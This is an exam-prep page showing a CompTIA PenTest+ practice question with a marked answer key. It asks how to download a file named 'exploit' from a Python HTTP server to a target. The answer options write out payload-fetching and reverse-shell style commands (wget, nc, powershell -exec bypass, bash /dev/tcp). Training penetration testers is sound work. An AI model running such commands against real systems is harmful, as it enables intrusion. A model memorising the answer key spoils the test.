CertyRush
Đang tải...
C CertyRush
Câu hỏi free preview

Câu 79: PT0-002: CompTIA PenTest+ Certification Exam

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891Which of the following commands could be used to download a file named exploit to a target machine for execution?

Nội dung câu hỏi

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891Which of the following commands could be used to download a file named exploit to a target machine for execution?

Các lựa chọn

Đáp án được giữ gọn theo nhãn A, B, C, D trong phần bình chọn tương tác.

  1. A. nc 10.10.51.50 9891 < exploit
  2. B. powershell -exec bypass -f \\10.10.51.50\9891
  3. C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
  4. D. wget 10.10.51.50:9891/exploit — đáp án hiện tại

Cộng đồng

0 bình luận công khai. Tên thành viên được ẩn một phần.

Chưa có bình luận. Mở giao diện tương tác để bắt đầu thảo luận.

Câu hỏi liền kề